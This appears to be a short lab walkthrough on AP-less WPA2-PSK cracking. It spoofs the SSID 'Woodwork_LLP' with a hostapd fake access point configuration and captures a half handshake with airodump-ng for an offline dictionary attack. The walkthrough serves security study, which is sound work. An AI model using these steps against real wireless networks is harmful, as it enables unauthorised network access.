AP-less WPA2-PSK Cracking

Two dual-band monitor mode capable WiFi interfaces are present on the user machine. There is a client device probing for a WPA2-PSK SSID "Woodwork_LLP".

Objective: Figure out the network pre-shared passphrase of Woodwork_LLP!

After placing the device into monitor mode and firing up airodump-ng , you can see that a client is probing.

It is important to note that as the real Pre-Shared Passphrase is not known, the device will never be able to successfully connect to the fake SSID but while it tries to connect to it, half 4-way handshake can be captured which is sufficient for launching dictionary attack on the network

Run airodump-ng wlan0 -c 6 -w capture

It is expected to not get anything (or just the probes from client) in airodump output

Create the fake AP

interface=wlan1
hw_mode=g
channel=6
driver=nl80211
ssid=Woodwork_LLP
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=123456789

Client wont be able to connect as the passphrase will be incorrect, but its enough to capture the handshake.